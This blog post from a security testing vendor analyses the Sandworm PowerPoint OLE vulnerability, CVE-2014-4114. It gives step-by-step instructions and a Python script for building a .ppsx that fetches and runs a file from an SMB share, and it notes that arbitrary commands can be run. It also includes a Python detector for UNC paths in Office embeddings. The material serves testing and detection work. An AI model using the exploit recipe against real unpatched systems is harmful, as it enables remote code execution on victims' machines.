Some Information on the SandWorm 0-Day Vulnerability

October 21, 2014 by Ixia Blog Team

Author: Garett Montgomery

When preparing to write a Strike for a vulnerability, I like to look around on the Internet to see whether any examples of the exploit exist. Usually I am checking that I have covered all of the exploit vectors, but I also like to learn as much as I can about the vulnerability. With last week's release of Microsoft's October Patch Tuesday updates, CVE-2014-4114 (MS14-060) got a lot of press, because quite a few sites picked up on the 0-day used by the Sandworm attackers to deliver a variant of BlackEnergy. The bug is in the Windows OLE package manager: a crafted Office document (the Sandworm sample was a PowerPoint show, .ppsx) can make the packager fetch a file from a remote share and run it. Typically you will not find much more than generic terms describing a vulnerability at a high level: enough to convince users of its seriousness, without providing enough detail to easily build an exploit. In this case, there was quite a lot of information available. One company claimed to have found the vulnerability (and responsibly reported it to Microsoft), and shortly thereafter another company claimed to have found it and reported it even earlier. Mainstream articles proliferated touting the use of a 0-day and mentioning that US institutions had been among those targeted. Exploit modules and PoCs (proofs of concept) were released, a screenshot of the patched function appeared on Twitter, and several low-level analyses of the exploit and the vulnerability were published.

So for once, there is quite a bit of useful technical information about a vulnerability, as well as examples of exploits. I thought I would summarize some of the more interesting details I found and provide commentary based on my own testing. At the end, I list the steps you can use to get started with your own testing.


To create your own test setup:

1. Create an SMB share that is reachable from your test system.

2. Create an executable file (a text file containing 'calc.exe', saved with a '.cmd' extension, is enough).

3. Take the .inf file from the sample and replace slide1.gif with the name of your executable file.

4. Save the modified .inf file and your executable file to the SMB share.

5. Copy the .ppsx file, unzip it, and go to the 'ppt/embeddings/' directory.

6. Open each .bin file with a hex editor and replace the original SMB path with the path to your replacement files on your share.

7. Zip the changed files back up and change the extension to .ppsx.

8. Open the .ppsx file with Microsoft PowerPoint on an unpatched, supported Windows operating system (more recent than XP).

9. Calculator pops up when the slideshow starts.

10. Try saving the .ppsx file in other formats to see the resulting output, and use those variants to test your network protection device.
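The unzip, patch and re-zip of steps 5 to 7 can be scripted. What follows is an added example of mine, not code from the original post or from the exploit sample: it patches every ppt/embeddings/*.bin inside a .ppsx, replacing the UNC path in both the ANSI and the UTF-16LE copies that a Packager object carries. The share path, the file names and the in-memory sample .ppsx are constructed for the demonstration. Because the Packager stream stores byte lengths ahead of its strings (my reading of the format; treat it as an assumption), the script requires the replacement path to have the same length as the original rather than rewriting those length fields.

```python
"""Steps 5-7 automated: rewrite the UNC path inside every OLE embedding of a
.ppsx and re-zip the result. The sample .ppsx below is constructed in memory."""
import io
import zipfile

EMBED_PREFIX = "ppt/embeddings/"

# Constructed paths (assumptions, not taken from the Sandworm sample). The
# replacement must be the same length as the original: the Packager stream
# stores byte lengths ahead of its strings and this script does not fix them up.
OLD = r"\\10.0.0.1\share\slide1.gif"
NEW = r"\\10.0.0.1\share\slides.cmd"


def encodings(path):
    """The embedded object carries the path as an ANSI string and as UTF-16LE;
    patch both so that no copy of the old path survives."""
    return [path.encode("latin-1"), path.encode("utf-16-le")]


def patch_embedding(blob, old_path, new_path):
    """Replace every copy of old_path in one oleObjectN.bin; returns (blob, hits)."""
    if len(old_path) != len(new_path):
        raise ValueError("replacement path must be the same length as the original")
    hits = 0
    for old, new in zip(encodings(old_path), encodings(new_path)):
        hits += blob.count(old)
        blob = blob.replace(old, new)
    return blob, hits


def rewrite_ppsx(ppsx, old_path, new_path):
    """Unzip, patch ppt/embeddings/*.bin, re-zip; returns (new_ppsx, hits)."""
    out = io.BytesIO()
    total = 0
    with zipfile.ZipFile(io.BytesIO(ppsx)) as zin, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zout:
        for name in zin.namelist():
            data = zin.read(name)
            if name.startswith(EMBED_PREFIX) and name.endswith(".bin"):
                data, hits = patch_embedding(data, old_path, new_path)
                total += hits
            zout.writestr(name, data)
    return out.getvalue(), total


def build_sample_ppsx(path=OLD):
    """Constructed stand-in for the real sample: a zip with two embeddings that
    hold the path in both encodings, null-terminated like a Packager stream."""
    blob = (b"\x02\x00" + b"slide1.gif\x00" + path.encode("latin-1") + b"\x00"
            + b"\x00" * 4 + path.encode("utf-16-le") + b"\x00\x00")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("ppt/slides/slide1.xml", "<p:sld/>")
        z.writestr("ppt/embeddings/oleObject1.bin", blob)
        z.writestr("ppt/embeddings/oleObject2.bin", blob)
    return buf.getvalue()


def demo():
    """Patch the constructed sample and verify no copy of the old path survives."""
    patched, hits = rewrite_ppsx(build_sample_ppsx(), OLD, NEW)
    with zipfile.ZipFile(io.BytesIO(patched)) as z:
        blobs = [z.read(n) for n in z.namelist() if n.startswith(EMBED_PREFIX)]
    clean = all(all(o not in b for o in encodings(OLD)) for b in blobs)
    present = all(all(n in b for n in encodings(NEW)) for b in blobs)
    return hits, clean and present


if __name__ == "__main__":
    print(demo())  # (4, True): two embeddings, ANSI plus UTF-16LE copy in each
```

To use it on a real file, read the .ppsx into bytes, call rewrite_ppsx with the original path found in step 6 and your own share path of the same length, and write the returned bytes back out with the .ppsx extension. A hit count of zero means the path you supplied did not match what the embeddings actually contain.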

Some highlights from my testing that I did not find mentioned anywhere else:

  • The file rename action is not required. I expected that only certain file formats or extensions could be downloaded and executed, but if you set up your own testing environment you will find that you do not need to change the file extension; you can execute your target file directly.
  • The .inf file can execute commands directly, so downloading an .exe is not required. You can run whatever command you choose (try replacing %1%\slide1.gif.exe with calc.exe).
  • Most Office files are zip archives, so any change to any file inside the archive alters the compressed bytes; static strings will not be of much use in detecting an exploit for this vulnerability. Every file that can embed OLE objects has to be decompressed and searched for embedded objects. Devices that only inspect bytes on the wire will have a hard time with this.
  • Using PowerPoint 2007, the .ppsx file could be saved in 27 different formats.
  • When saved as a PowerPoint XML Presentation (.xml), the file was a single XML document, and the embedded object contents were base64-encoded inside the XML. This will likely require a different detection method.
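Those last two observations (the compressed container, and the base64 form of the XML presentation) are exactly why a detector has to open the container before matching anything. What follows is an added example, not code from the original post or from any Ixia product: it decompresses an OOXML zip and inspects only the embedding parts, and for the single-file XML presentation it decodes the base64 binary parts first, then looks for UNC paths in both ANSI and UTF-16LE form. The element names used for the XML format (pkg:part, pkg:binaryData) follow the Flat OPC package layout as I understand it and are an assumption; the sample files and the share path are constructed.

```python
"""Find UNC paths inside embedded OLE objects, whether the Office file is an
OOXML zip (.ppsx/.pptx/.docx/.xlsx) or PowerPoint's single-file XML format,
where binary parts are base64-encoded inside the XML. Samples are constructed."""
import base64
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# \\host\share\... as ANSI bytes, and the same thing as UTF-16LE (every
# character followed by a null byte). Packager objects carry both forms.
UNC_ANSI = re.compile(rb"\\\\[\w.\-]+\\[^\x00]{1,200}")
UNC_WIDE = re.compile(rb"(?:\\\x00){2}(?:[\w.\-]\x00)+\\\x00(?:[^\x00]\x00){1,200}")


def unc_paths(blob):
    """Return every UNC path found in a raw embedded-object blob."""
    found = [m.group(0).decode("latin-1") for m in UNC_ANSI.finditer(blob)]
    found += [m.group(0).decode("utf-16-le") for m in UNC_WIDE.finditer(blob)]
    return found


def scan_ooxml(data):
    """Decompress the zip and inspect only the embedding parts."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if "/embeddings/" in name:  # ppt/, word/ and xl/ all use this folder
                paths = unc_paths(z.read(name))
                if paths:
                    hits[name] = paths
    return hits


def _local(tag):
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return tag.rsplit("}", 1)[-1]


def scan_flat_opc(data):
    """The XML presentation is a Flat OPC package: each <pkg:part> holds its
    binary content base64-encoded in <pkg:binaryData> (element names are an
    assumption; local names are matched so the namespace does not matter)."""
    hits = {}
    for part in ET.fromstring(data).iter():
        if _local(part.tag) != "part":
            continue
        name = next((v for k, v in part.attrib.items() if _local(k) == "name"), "?")
        for child in part:
            if _local(child.tag) == "binaryData" and child.text:
                paths = unc_paths(base64.b64decode("".join(child.text.split())))
                if paths:
                    hits[name] = paths
    return hits


def scan(data):
    """Dispatch on the container's leading bytes, not on the file extension."""
    if data[:2] == b"PK":
        return scan_ooxml(data)
    if data.lstrip()[:1] == b"<":
        return scan_flat_opc(data)
    return {}


# --- constructed samples (not the Sandworm files) ---------------------------
SAMPLE_PATH = r"\\10.0.0.1\share\slide1.gif"


def _packager_blob(path):
    """Minimal stand-in for a Packager stream: label, ANSI path, UTF-16LE path."""
    return (b"\x02\x00" + b"slide1.gif\x00" + path.encode("latin-1") + b"\x00"
            + b"\x00" * 4 + path.encode("utf-16-le") + b"\x00\x00")


def sample_ppsx():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("ppt/embeddings/oleObject1.bin", _packager_blob(SAMPLE_PATH))
    return buf.getvalue()


def sample_xml_presentation():
    b64 = base64.b64encode(_packager_blob(SAMPLE_PATH)).decode()
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<pkg:package xmlns:pkg="http://schemas.microsoft.com/office/2006/xmlPackage">'
        '<pkg:part pkg:name="/ppt/embeddings/oleObject1.bin" '
        'pkg:contentType="application/vnd.openxmlformats-officedocument.oleObject">'
        '<pkg:binaryData>' + b64 + '</pkg:binaryData></pkg:part></pkg:package>'
    ).encode()


if __name__ == "__main__":
    print(scan(sample_ppsx()))
    print(scan(sample_xml_presentation()))
```

A UNC path inside an embedding is not proof of exploitation on its own (legitimate packaged objects can reference shares too), but it is the indicator a wire-level string match cannot see, and the same unc_paths routine can be pointed at any other container once its parts have been extracted.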
